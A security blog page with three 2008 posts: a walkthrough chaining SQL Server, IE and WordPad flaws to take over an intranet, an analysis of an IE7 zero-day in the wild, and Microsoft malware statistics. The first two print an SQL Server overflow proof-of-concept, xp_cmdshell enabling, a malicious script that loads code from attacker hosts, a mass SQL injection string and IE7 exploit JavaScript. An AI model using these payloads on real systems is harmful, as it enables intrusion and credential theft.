Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Windows XP

Microsoft’s Security Hole Framework

with one comment

Since a few days, news about the Internet Explorer exploit has been sweeping the Internet (see previous post Internet Explorer 7 Attack in the Wild). It has not been confirmed that Internet Explorer 5, 6 and 7 are affected and the problem reside in the data binding of objects. Basically, the array containing objects in memory is now updated after their deletion; therefore the code stays in memory:

The vulnerability is caused by memory corruption resulting from the way Internet Explorer handles DHTML Data Bindings. This affects all currently supported versions of Internet Explorer. Malicious HTML that targets this vulnerability causes IE to create an array of data binding objects, release one of them, and later reference it. This class of vulnerability is exploitable by preparing heap memory with attacker-controlled data (“heap spray”) before the invalid pointer dereference[1].

A patch as now been issued by Microsoft[2], so update your Windows….now!

Another vulnerability that hasn’t made as much noise is the one found by SEC Consult Vulnerability Lab[3], probably because this vulnerability is in Microsoft SQL Server 2000 and 2005, which is not as widely known as Internet Explorer. Not to forget the hole found in Wordpad also[4]. This is significant though, as Microsoft now offer a complete framework for hackers to exploit a Microsoft system.

Therefore, it is now possible for an attacker to execute arbitrary code on a server using SQL server, which might be use to modify web pages to exploit the Internet Explorer vulnerability. Imagine an intranet with a web server running Windows Server 2003, a SQL Server as its database and where all clients are forced to run Internet Explorer. Now an employee with the appropriate knowledge could practically own the entire network. The hardest part would be to find the injection point. That means studying and testing the Intranet website for unsanitized input. If he can’t, just try to social engineer your way by sending a malicious WRI file to one of the administrator.

If one injection point can be found, then he could own the SQL Server using the last vulnerability discovered in SQL Server. This exploit will cause SQL Server to write memory and therefore allowing execution of arbitrary code. This is done by using the sp_replwritetovarbin stored procedure with illegal arguments. Bernhard Mueller has released a proof-of-concept script that can be used to verify if the database is vulnerable to the attack:

DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf

This procedure will trigger an access violation if the current SQL Server is vulnerable. Then one only needs to append correctly the appropriate shellcode to the buffer “@buf” and gain new privileges. Once the database is yours, look for fields in tables that are used to make links on the web server of the intranet, and use the technique described in this previous article on how this can give you access to about every computer that connects to the webserver. Of course if the database contains sensible information such as passwords, this step might not be necessary.

You could also spawn a command shell from SQL Server by enabling the xp_cmdshell stored procedure:

EXEC master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE
EXEC master.dbo.sp_configure 'xp_cmdshell', 1
RECONFIGURE

And then executing any command you wish with that command:

xp_cmdshell

After that, the network is yours. But what if SQL Server is not installed? Apparently Wordpad is there to the rescue….or almost as this exploit only apply to Windows XP SP2, Windows 2000 and Windows Server 2003. This exploit will result in the attacker gaining the same privilege as the user that opened the malicious .wri file, therefore here is another reason not to use your computer as Administrator. According to the advisory:

When Microsoft Office Word is installed, Word 97 documents are by default opened using Microsoft Office Word, which is not affected by this vulnerability. However, an attacker could rename a malicious file to have a Windows Write (.wri) extension, which would still invoke WordPad[5].

The source of the problem comes from the Wordpad Text Converter, a component use to read Word documents even if Microsoft Word isn’t installed on the system. Not much is known about this attack. Trend Micro as an article about it and a trojan[6], identified as TROJ_MCWORDP.A[7] using this vulnerability.

This attack is triggered when the user opens a .WRI, .DOC or .RTF file, most of the time sent by e-mail. Apparently this trojan looks to see if it runs in a virtual environment (VMWare). If it is not, it drops a BKDR_AGENT.VBI file, which will open a random port on the machine it just infected, opening it to the entire world.

Schema of the Wordpad Attack (Image from Trend Micro)

Schema of the Wordpad Attack (Image from Trend Micro)

See also:

New MS SQL Server vulnerability“, Toby Kohlenberg, SANS Internet Storm Center, December 15, 2008, http://isc.sans.org/diary.html?storyid=5485 (accessed on December 16, 2008)

Microsoft looking into WordPad zero-day flaw“, Robert Vamosi, CNet News, December 10, 2008, http://news.cnet.com/8301-1009_3-10120546-83.html (accessed on December 16, 2008)

Vulnerability Note VU#926676“, US CERT, December 11, 2008, http://www.kb.cert.org/vuls/id/926676 (accessed on December 16, 2008)


[1] “Clarification on the various workarounds from the recent IE advisory”,  Microsoft, December 12, 2008, http://blogs.technet.com/swi/archive/2008/12/12/Clarification-on-the-various-workarounds-from-the-recent-IE-advisory.aspx (accessed on December 16, 2008)

[2] “Microsoft Issuing Emergency Patch For Internet Explorer”, Thomas Claburn, InformationWeek, December 16, 2008, http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=212500756&subSection=Vulnerabilities+and+threats (accessed on December 16, 2008)

[3] “Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability”, Bernhard Mueller, SEC Consult Vulnerability Lab, December 4, 2008, http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt (accessed on December 16, 2008)

[4] “Exploit for unpatched WordPad, IE flaws in the wild”, Peter Bright, Ars Technica, December 10, 2008, http://arstechnica.com/journals/microsoft.ars/2008/12/10/exploit-for-unpatched-wordpad-ie-flaws-in-the-wild (accessed on December 16, 2008)

[5] “Microsoft Security Advisory (960906)”,  Microsoft Technet, December 9, 2008, http://www.microsoft.com/technet/security/advisory/960906.mspx (accessed on December 16, 2008)

[6] “A Word(pad) of Caution”, Roderick Ordoñez, Trend Micro,  http://blog.trendmicro.com/a-wordpad-of-caution/ (accessed on December 16, 2008)

[7] “TROJ_MCWORDP.A”, Trend Micro, December 11, 2008, http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_MCWORDP.A&VSect=P (accessed on December 16, 2008)

Internet Explorer 7 Attack in the Wild

with 6 comments

Bits of information about the new 0-day exploit are surfacing on the web. This exploit provokes a heap overflow in the XML parser of Internet Explorer 7. The exploit works with the fully patched version of Windows XP, Windows Server 2008 and Windows Vista SP1[1].

The Infection

The exploit is initiated by a JavaScript file stored on infected servers across the web. The example given by the SANS Internet Storm Center is located at http://17gamo [dot] com/1.js. F-Secure also reported the http://www.nihaorr1.com/1.js URL as being infected. The content of the JavaScript file is injected through sites by a SQL injection attack and it contains a link to a web page containing the exploit and the shellcode. A complete list of infected websites can be found at Shadowserver.

The contents of the 1.js file (be careful of what you do with this info!):

document.writeln("<script src=\"http:\/\/count48.51yes.com\/click.aspx?id=484329676&logo=1\">
<\/script>");
document.write("<iframe width=100 height=0 src=http://www.17gamo.com/co/index.htm>
<\/iframe>");

The SQL injection works by adding a link to every text field contained in an accessible database. Therefore, once text contained in the database is retrieved to be displayed on the webpage, the malicious link to the JavaScript is also included in it and executes the contents of the file, which contains two statements.  One is a counter to measure how many victimes it made, the other is an iFrame to the malicious webpage. The SQL injection usually takes this form, but it really depends on which software is attacked:

rtrim(convert(varchar(4000),['+@C+']))+''<script src=http://17gamo [dot] com/1.js>
</script>''')FETCH NEXT FROM

The Exploit

This is part of the JavaScript found in the while. It checks the version of the browser and OS and triggers the buffer overflow:

sleep(6000);
</script>

nav = navigator.userAgent.toLowerCase();

if (navigator.appVersion.indexOf(‘MSIE’) != -1) {
    version = parseFloat(navigator.appVersion.split(‘MSIE’)[1])
}

if (version==7) {
w2k3 = ((nav.indexOf(‘windows nt 5.2’) != -1) || (nav.indexOf(‘windows 2003’) != -1));
wxp = ((nav.indexOf(‘windows nt 5.1’) != -1) || (nav.indexOf(‘windows xp’) != -1));

    if (wxp || w2k3)
document.write(‘<XML ID=I><X>    <C><![CDATA[<image 
SRC=http://&amp;#2570;&amp;#2570;.xxxxx.org    >]]></C></X>
</XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>’);

    var i=1;
    while (i <= 10 ) {
        window.status= “ ”; i++;
    }
}
</script>

You can get a working example at milw0rm.com.

The script used in the wild waits for 6 seconds before starting, apparently to fool anti-viruses. It then verifies if the current browser is Internet Explorer and if it’s version 7. It also checks that the OS is Windows XP or 2003 (but the exploit does work in Vista also). If all conditions are met, the script will then write the malformed XML code to exploit to the parser. The loop at the end keeps the status bar from displaying any information to the user. The parsing of the XML code will trigger a heap overflow in the parser and arbitrary code can be executed.

The vulnerability is explained more in detailed by the Chinese researchers[2] that first discovered the exploit and that released the code by mistake. The original article is written in Mandarin, but a rough translation from Google leads to a mistake in the handling of pointers when “SDHTML objects” are created. A machine translated post on a forum gave that information[3]:

Recently caught using IE7 0day vulnerability code, as in dealing with the object SDHTML errors lead to memory disorders, through the structural conditions of a specific code lead to cross-border memory. 现已有人赶制出网马生成器相信会在短期内流行。 It was now working towards a network of horse generator, will be popular in the short term. 该漏洞存在于IE7XML可以导致内存越界的漏洞攻击者通过构造畸形XML代码并且使用JavaScript脚本操作ShellCode去执行任意代码。 The vulnerability exists in IE7’s XML, the memory can lead to cross-border loopholes, the attacker through the abnormal structure using JavaScript and XML code script ShellCode operation to execute arbitrary code.
漏洞描述 Description of the loopholes:
由于SDHTML里处理对象存在错误导致内存紊乱通过构造某种条件可以使得SDHTML检测到错误释放已被分配的对象但是在释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行如果这些内存又被分配给其他用途将导致SDHTML把这些内存当作一个对象来操作。 SDHTML due to errors in handling the object lead to memory disorders, through some kind of structural conditions can make mistakes SDHTML detected the release of the allocation has been the target, but the release has been the target of the distribution did not return after SDHTML be released but continue to use the object The implementation of the memory, if memory has been allocated to other purposes, such SDHTML will lead to memory as an object to the operation. 攻击者使用了XMLSRC字符串对象占用了这些释放对象的空间而对象指针里包含函数例程指针最终导致代码执行。 An attacker using the XML string SRC release of these objects taking up space objects, and object pointer included in routine function pointer, leading to the implementation of the code.

This hole wasn’t patch with the latest update from Microsoft. No details are available on when a hotfix will be distributed. Disabling Active Scripting will prevent this exploit from downloading the Trojan. Doing so will also protect anyone from most of the online attacks (but it will also make some sites unusable). Other solution: use Firefox or Opera. And for the geekiest, you can always use the safest browser around by downloading it here.

Observed Payload

Right now, it seems these attacks using this exploit are limited to MMORPG password stealers. The shellcode included with the current exploit will download http://www [dot] steoo [dot] com/admin/win.exe[4]. F-secure detect the trojan contained in the file as Win32.Magania and as Infostealer.Gamania[5] by Symantec. This malware is a game password stealing Trojan for games created by the Taiwanese company Gamania, creator of Maple Story amongst others.

The trojan will create various files into the %SYSTEM% directory and add himself in the registry so that it boots every time the computer starts. Files created include[6]:

  • %System%\Kerne0223.exe
  • %System%\Kerne0223.dll
  • %Windir%\SVCH0ST.EXE
  • %System%\aer4532gxa.dll (detected as Infostealer.Lineage)
  • [PATH TO TROJAN]\gg.bat
  • %System%\drivers\etc\hosts
  • c:\log.txt

And will steal every credentials entered by the user on these sites:

  • [http://]club.pchome.com.tw
  • [http://]gash.gamania.com/gash_loginform1.asp?Message=
  • [http://]tw.gamania.com/default.asp?user_locate=
  • [http://]tw.gamania.com/ghome/home_center.asp
  • [http://]tw.gamania.com/ghome/home_login.asp?Message=
  • [http://]tw.gamania.com/ghome/home_login.asp?user_locate=/ghome/home_center.asp
  • [http://]tw.gashcard.gamania.com/
  • [http://]www.gamania.com/ghome/home_center.asp
  • [https://]gash.gamania.com/gashinclude/top.asp
  • [https://]gash.gamania.com/gashindex.asp
  • [https://]gash.gamania.com/joinwithgama/
  • [https://]gash.gamania.com/openmainaccount/
  • [https://]gash.gamania.com/queryaccount/
  • [https://]tw.event.gamania.com/lineageevent/e20050502/index.asp
  • [https://]tw.event.gamania.com/lineageevent/modify_warehouse_pwd/index.asp
  • [https://]tw.gash.gamania.com/GASHLogin.aspx?
  • [https://]tw.gash.gamania.com/UpdateMainAccountPassword.aspx
  • [https://]tw.gash.gamania.com/UpdateServiceAccountPassword.aspx?
  • [https://]tw.gash.gamania.com/accountctr/changeservicepwd.asp
  • [https://]tw.gash.gamania.com/gashindex.asp
  • [https://]tw.gash.gamania.com/index.aspx
  • [https://]tw.gash.gamania.com/joinwithgama/
  • [https://]tw.goodlock.gamania.com/ShowNew.aspx
  • [https://]tw.goodlock.gamania.com/changeservicepwd.asp
  • [https://]tw.goodlock.gamania.com/index.aspx

It is strongly believed that this Trojan origin is based in China. Various variants of this Trojan have been created. Variants may come with a keylogger and rootkits.

See also:

“Microsoft Security Advisory (961051)”, Microsoft, December 10, 2008, http://www.microsoft.com/technet/security/advisory/961051.mspx (accessed on December 11, 2008)

“Mass SQL Injection”, F-Secure, December 11, 2008, http://www.f-secure.com/weblog/archives/00001427.html (accessed on December 11, 2008)

“Chinese researchers inadvertently release IE7 exploit code”, John Leyden, The Register, December 11, 2008, http://www.theregister.co.uk/2008/12/11/ie7_exploit_leak/ (accessed on December 11, 2008)

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl


[1] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[2] “Alert: IE70DAY attack code has been linked to the use of  Trojan Horse”, December 12, 2008, http://www.scanw.com/blog/archives/303 (accessed on December 11, 2008 – Eastern Time GMT-5)

[3] Translated by Google Translate from Chinese, http://bbs.wopti.net/thread-80485-1-1.html (accessed on December 11, 2008)

[4] “0-day exploit for Internet Explorer in the wild”, Bojan Zdrnja, SANS Internet Storm Center, December 10, 2008, http://isc.sans.org/diary.html?storyid=5458 (accessed on December 11, 2008)

[5] “Infostealer.Gamania”, Hiroshi Shinotsuka, Symantec, February 13, 2007, http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99 (accessed on December 11, 2008)

[6] Ibid.

Microsoft: Malware Up 38% in United States in 2008

with one comment

According to the latest Security Intelligence Report from Microsoft, malicious software installations on computers increased 38% in the U.S for 2008.[1] Also, the number of “High Severity” vulnerabilities detected increased by 13% in the second half of 2007, putting the total of “High Severity” vulnerabilities to 48%.

Downloaders and droppers, accounting for 30% of all malicious software, with around 7 millions computers infected in the United States alone.

And of course, no good Microsoft document would be complete by stating that Vista in more awesome than XP, and therefore the report states that if you own Windows XP SP3, you’re likely to be infected 9 times on 1000 infections, while this number drops to 4 times on 1000 infections for Vista.

“For browser-based attacks on Windows XP-based machines, Microsoft vulnerabilities accounted for 42 percent of the total. On Windows Vista-based machines, however, the proportion of vulnerabilities attacked in Microsoft software was much smaller, accounting for just 6 percent of the total[2].”

Taken from the report:

Country/Region

2007

2008

% Chg.

Afghanistan

58.8

76.4

29.9

Bahrain

28.2

29.2

3.4

Morocco

31.3

27.8

-11.4

Albania

30.7

25.4

-17.4

Mongolia

29.9

24.7

-17.6

Brazil

13.2

23.9

81.8

Iraq

23.8

23.6

-1.1

Dominican Republic

24.5

23.2

-5.2

Egypt

24.3

22.5

-7.5

Saudi Arabia

22.2

22.3

0.4

Tunisia

15.9

21.9

37.3

Turkey

25.9

21.9

-15.4

Jordan

20.4

21.6

5.5

Former Yugoslav Republic of Macedonia

16.3

21.1

29.8

Lebanon

20.6

20.2

-1.8

Yemen

17.7

20.1

13.7

Portugal

14.9

19.6

31.7

Algeria

22.2

19.5

-12.2

Libya

17.3

19.5

13.1

Mexico

14.8

17.3

17

United Arab Emirates

18.2

17.3

-4.8

Monaco

13.7

17.0

23.7

Serbia

11.8

16.6

41.4

Bosnia and Herzegovina

12.8

16.3

27.5

Jamaica

15.0

16.3

8.9

Table 1.0 – Countries with the Highest Infection Rates[3]

See also:

“Microsoft Security Intelligence Report”, Microsoft, January-June 2008, http://www.microsoft.com/downloads/details.aspx?FamilyId=B2984562-47A2-48FF-890C-EDBEB8A0764C&displaylang=en (accessed on November 4, 2008)

“Les menaces en augmentation de 43%, dit Microsoft”, Marie-Ève Morasse, Cyberpresse, November 3, 2008, http://technaute.cyberpresse.ca/nouvelles/internet/200811/03/01-35773-les-menaces-en-augmentation-de-43-dit-microsoft.php (in French) (accessed on November 4, 2008)


[1] “Microsoft Security Intelligence Report”, Microsoft, January-June 2008, p. 122

[2] Ibid. p. 5

[3] Ibid. p.49

Written by Jonathan Racicot

November 4, 2008 at 4:39 pm